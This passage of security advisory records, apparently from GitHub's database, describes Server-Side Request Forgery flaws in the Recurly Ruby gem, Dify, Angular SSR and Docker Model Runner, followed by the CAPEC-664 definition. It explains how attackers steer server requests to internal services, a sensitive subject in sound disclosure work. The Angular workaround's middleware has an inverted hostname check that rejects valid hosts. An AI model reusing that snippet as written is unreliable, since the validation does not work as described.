"events": [
{
"introduced": "2.10.0"
},
{
"fixed": "2.10.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-0905"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T22:01:40Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "The Recurly Client Ruby Library before 2.0.13, 2.1.11, 2.2.5, 2.3.10, 2.4.11, 2.5.4, 2.6.3, 2.7.8, 2.8.2, 2.9.2, 2.10.4, 2.11.3 is vulnerable to a Server-Side Request Forgery vulnerability in the `Resource#find` method that could result in compromise of API keys or other critical resources.",
"id": "GHSA-x27v-x225-gq8g",
"modified": "2023-08-29T15:38:45Z",
"published": "2017-12-06T16:43:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-0905"
},
{
"type": "WEB",
"url": "https://github.com/recurly/recurly-client-ruby/commit/1bb0284d6e668b8b3d31167790ed6db1f6ccc4be"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/288635"
},
{
"type": "PACKAGE",
"url": "https://github.com/recurly/recurly-client-ruby"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/recurly/CVE-2017-0905.yml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Recurly gem Server-Side Request Forgery in Resource#find method"
}
GHSA-X284-MQWH-M8WM
Vulnerability from github – Published: 2025-09-30 18:30 – Updated: 2025-10-01 21:31Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. A different vulnerability than CVE-2025-29720.
{
"affected": [],
"aliases": [
"CVE-2025-56520"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-30T17:15:41Z",
"severity": "MODERATE"
},
"details": "Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component controllers.console.remote_files.RemoteFileUploadApi. A different vulnerability than CVE-2025-29720.",
"id": "GHSA-x284-mqwh-m8wm",
"modified": "2025-10-01T21:31:20Z",
"published": "2025-09-30T18:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-56520"
},
{
"type": "WEB",
"url": "https://github.com/langgenius/dify/issues/22532"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X288-3778-4HHX
Vulnerability from github – Published: 2026-02-25 22:42 – Updated: 2026-02-25 22:42A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Angular SSR request handling pipeline. The vulnerability exists because Angular’s internal URL reconstruction logic directly trusts and consumes user-controlled HTTP headers specifically the Host and X-Forwarded-* family to determine the application's base origin without any validation of the destination domain.
Specifically, the framework didn't have checks for the following:
- Host Domain: The Host and X-Forwarded-Host headers were not checked to belong to a trusted origin. This allows an attacker to redefine the "base" of the application to an arbitrary external domain.
- Path & Character Sanitization: The X-Forwarded-Host header was not checked for path segments or special characters, allowing manipulation of the base path for all resolved relative URLs.
- Port Validation: The X-Forwarded-Port header was not verified as numeric, leading to malformed URI construction or injection attacks.
This vulnerability manifests in two primary ways:
- Implicit Relative URL Resolution: Angular's
HttpClientresolves relative URLs against this unvalidated and potentially malformed base origin. An attacker can "steer" these requests to an external server or internal service. - Explicit Manual Construction: Developers injecting the
REQUESTobject to manually construct URLs (for fetch or third-party SDKs) directly inherit these unsanitized values. By accessing theHost/X-Forwarded-*headers, the application logic may perform requests to attacker-controlled destinations or malformed endpoints.
Impact
When successfully exploited, this vulnerability allows for arbitrary internal request steering. This can lead to:
- Credential Exfiltration: Stealing sensitive Authorization headers or session cookies by redirecting them to an attacker's server.
- Internal Network Probing: Accessing and transmitting data from internal services, databases, or cloud metadata endpoints (e.g., 169.254.169.254) not exposed to the public internet.
- Confidentiality Breach: Accessing sensitive information processed within the application's server-side context.
Attack Preconditions
- The victim application must use Angular SSR (Server-Side Rendering).
- The application must perform
HttpClientrequests using relative URLs OR manually construct URLs using the unvalidatedHost/X-Forwarded-*headers using theREQUESTobject. - Direct Header Access: The application server is reachable by an attacker who can influence these headers without strict validation from a front-facing proxy.
- Lack of Upstream Validation: The infrastructure (Cloud, CDN, or Load Balancer) does not sanitize or validate incoming headers.
Patches
- 21.2.0-rc.1
- 21.1.5
- 20.3.17
- 19.2.21
Workarounds
- Use Absolute URLs: Avoid using
req.headersfor URL construction. Instead, use trusted variables for your base API paths. - Implement Strict Header Validation (Middleware): If you cannot upgrade immediately, implement a middleware in your
server.tsto enforce numeric ports and validated hostnames.
const ALLOWED_HOSTS = new Set(['your-domain.com']);
app.use((req, res, next) => {
const hostHeader = (req.headers['x-forwarded-host'] ?? req.headers['host'])?.toString();
const portHeader = req.headers['x-forwarded-port']?.toString();
if (hostHeader) {
const hostname = hostHeader.split(':')[0];
// Reject if hostname contains path separators or is not in allowlist
if (/^[a-z0-9.:-]+$/i.test(hostname) ||
(!ALLOWED_HOSTS.has(hostname) && hostname !== 'localhost')) {
return res.status(400).send('Invalid Hostname');
}
}
// Ensure port is strictly numeric if provided
if (portHeader && !/^\d+$/.test(portHeader)) {
return res.status(400).send('Invalid Port');
}
next();
});
References
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c 21.2.0-rc.0"
},
"package": {
"ecosystem": "npm",
"name": "@angular/ssr"
},
"ranges": [
{
"events": [
{
"introduced": "21.2.0-next.0"
},
{
"fixed": "21.2.0-rc.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@angular/ssr"
},
"ranges": [
{
"events": [
{
"introduced": "21.0.0-next.0"
},
{
"fixed": "21.1.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@angular/ssr"
},
"ranges": [
{
"events": [
{
"introduced": "20.0.0-next.0"
},
{
"fixed": "20.3.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@angular/ssr"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "19.2.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@nguniversal/common"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "16.2.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@nguniversal/express-engine"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "16.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27739"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T22:42:36Z",
"nvd_published_at": "2026-02-25T18:23:40Z",
"severity": "CRITICAL"
},
"details": "A [Server-Side Request Forgery (SSRF)](https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/SSRF) vulnerability has been identified in the Angular SSR request handling pipeline. The vulnerability exists because Angular\u2019s internal URL reconstruction logic directly trusts and consumes user-controlled HTTP headers specifically the Host and `X-Forwarded-*` family to determine the application\u0027s base origin without any validation of the destination domain.\n\nSpecifically, the framework didn\u0027t have checks for the following:\n- **Host Domain**: The `Host` and `X-Forwarded-Host` headers were not checked to belong to a trusted origin. This allows an attacker to redefine the \"base\" of the application to an arbitrary external domain.\n- **Path \u0026 Character Sanitization**: The `X-Forwarded-Host` header was not checked for path segments or special characters, allowing manipulation of the base path for all resolved relative URLs.\n- **Port Validation**: The `X-Forwarded-Port` header was not verified as numeric, leading to malformed URI construction or injection attacks.\n\n\nThis vulnerability manifests in two primary ways:\n\n- **Implicit Relative URL Resolution**: Angular\u0027s `HttpClient` resolves relative URLs against this unvalidated and potentially malformed base origin. An attacker can \"steer\" these requests to an external server or internal service.\n- **Explicit Manual Construction**: Developers injecting the `REQUEST` object to manually construct URLs (for fetch or third-party SDKs) directly inherit these unsanitized values. By accessing the `Host` / `X-Forwarded-*` headers, the application logic may perform requests to attacker-controlled destinations or malformed endpoints.\n\n### Impact\n\nWhen successfully exploited, this vulnerability allows for arbitrary internal request steering. This can lead to:\n- **Credential Exfiltration**: Stealing sensitive `Authorization` headers or session cookies by redirecting them to an attacker\u0027s server.\n- **Internal Network Probing**: Accessing and transmitting data from internal services, databases, or cloud metadata endpoints (e.g., `169.254.169.254`) not exposed to the public internet.\n- Confidentiality Breach: Accessing sensitive information processed within the application\u0027s server-side context.\n\n### Attack Preconditions\n\n- The victim application must use Angular SSR (Server-Side Rendering).\n- The application must perform `HttpClient` requests using relative URLs OR manually construct URLs using the unvalidated `Host` / `X-Forwarded-*` headers using the `REQUEST` object.\n- **Direct Header Access**: The application server is reachable by an attacker who can influence these headers without strict validation from a front-facing proxy.\n- **Lack of Upstream Validation**: The infrastructure (Cloud, CDN, or Load Balancer) does not sanitize or validate incoming headers.\n\n### Patches\n\n- 21.2.0-rc.1\n- 21.1.5\n- 20.3.17\n- 19.2.21\n\n\n### Workarounds\n- **Use Absolute URLs:** Avoid using `req.headers` for URL construction. Instead, use trusted variables for your base API paths.\n- **Implement Strict Header Validation (Middleware)**: If you cannot upgrade immediately, implement a middleware in your `server.ts` to enforce numeric ports and validated hostnames.\n\n```ts\nconst ALLOWED_HOSTS = new Set([\u0027your-domain.com\u0027]);\n\napp.use((req, res, next) =\u003e {\n const hostHeader = (req.headers[\u0027x-forwarded-host\u0027] ?? req.headers[\u0027host\u0027])?.toString();\n const portHeader = req.headers[\u0027x-forwarded-port\u0027]?.toString();\n\n if (hostHeader) {\n const hostname = hostHeader.split(\u0027:\u0027)[0];\n // Reject if hostname contains path separators or is not in allowlist\n if (/^[a-z0-9.:-]+$/i.test(hostname) || \n (!ALLOWED_HOSTS.has(hostname) \u0026\u0026 hostname !== \u0027localhost\u0027)) {\n return res.status(400).send(\u0027Invalid Hostname\u0027);\n }\n }\n\n // Ensure port is strictly numeric if provided\n if (portHeader \u0026\u0026 !/^\\d+$/.test(portHeader)) {\n return res.status(400).send(\u0027Invalid Port\u0027);\n }\n\n next();\n});\n```\n\n### References\n\n- [Fix](https://github.com/angular/angular-cli/pull/32516)\n- [Docs](https://angular.dev/best-practices/security#preventing-server-side-request-forgery-ssrf)",
"id": "GHSA-x288-3778-4hhx",
"modified": "2026-02-25T22:42:36Z",
"published": "2026-02-25T22:42:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/angular/angular-cli/security/advisories/GHSA-x288-3778-4hhx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27739"
},
{
"type": "WEB",
"url": "https://github.com/angular/angular-cli/pull/32516"
},
{
"type": "WEB",
"url": "https://angular.dev/best-practices/security#preventing-server-side-request-forgery-ssrf"
},
{
"type": "WEB",
"url": "https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/SSRF"
},
{
"type": "PACKAGE",
"url": "https://github.com/angular/angular-cli"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Angular SSR is vulnerable to SSRF and Header Injection via request handling pipeline"
}
GHSA-X2F5-332J-9XWQ
Vulnerability from github – Published: 2026-03-30 17:08 – Updated: 2026-04-06 16:44Summary
Docker Model Runner contains an SSRF vulnerability in its OCI registry token exchange flow. When pulling a model, Model Runner follows the realm URL from the registry's WWW-Authenticate header without validating the scheme, hostname, or IP range. A malicious OCI registry can set the realm to an internal URL (e.g., http://127.0.0.1:3000/), causing Model Runner running on the host to make arbitrary GET requests to internal services and reflect the full response body back to the caller. Additionally, the token exchange mechanism can relay data from internal services back to the attacker-controlled registry via the Authorization: Bearer header.
Patches
Fixed in Docker Model Runner v1.1.25 Docker Desktop users should update to 4.67.0 or later, which includes the fixed Model Runner.
Workarounds
For Docker Desktop users, enabling Enhanced Container Isolation (ECI) blocks container access to Model Runner, preventing exploitation. However, if the Docker Model Runner is exposed to localhost over TCP in specific configurations, the vulnerability is still exploitable.
Impact
An unprivileged container or a malicious OCI registry that the user performed a pull from might issue GET requests to host-local services (localhost, internal network)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/docker/model-runner"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.1.25"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33990"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T17:08:25Z",
"nvd_published_at": "2026-04-01T17:28:39Z",
"severity": "MODERATE"
},
"details": "## Summary\nDocker Model Runner contains an SSRF vulnerability in its OCI registry token exchange flow. When pulling a model, Model Runner follows the realm URL from the registry\u0027s `WWW-Authenticate` header without validating the scheme, hostname, or IP range. A malicious OCI registry can set the realm to an internal URL (e.g., `http://127.0.0.1:3000/`), causing Model Runner running on the host to make arbitrary GET requests to internal services and reflect the full response body back to the caller. Additionally, the token exchange mechanism can relay data from internal services back to the attacker-controlled registry via the `Authorization: Bearer` header.\n\n## Patches\nFixed in Docker Model Runner v1.1.25\nDocker Desktop users should update to 4.67.0 or later, which includes the fixed Model Runner.\n\n## Workarounds\nFor Docker Desktop users, enabling Enhanced Container Isolation (ECI) blocks container access to Model Runner, preventing exploitation. However, if the Docker Model Runner is exposed to localhost over TCP in specific configurations, the vulnerability is still exploitable.\n\n## Impact\nAn unprivileged container or a malicious OCI registry that the user performed a pull from might issue GET requests to host-local services (localhost, internal network)",
"id": "GHSA-x2f5-332j-9xwq",
"modified": "2026-04-06T16:44:36Z",
"published": "2026-03-30T17:08:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/docker/model-runner/security/advisories/GHSA-x2f5-332j-9xwq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33990"
},
{
"type": "PACKAGE",
"url": "https://github.com/docker/model-runner"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Docker Model Runner OCI Registry Client Vulnerable to Server-Side Request Forgery (SSRF)"
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.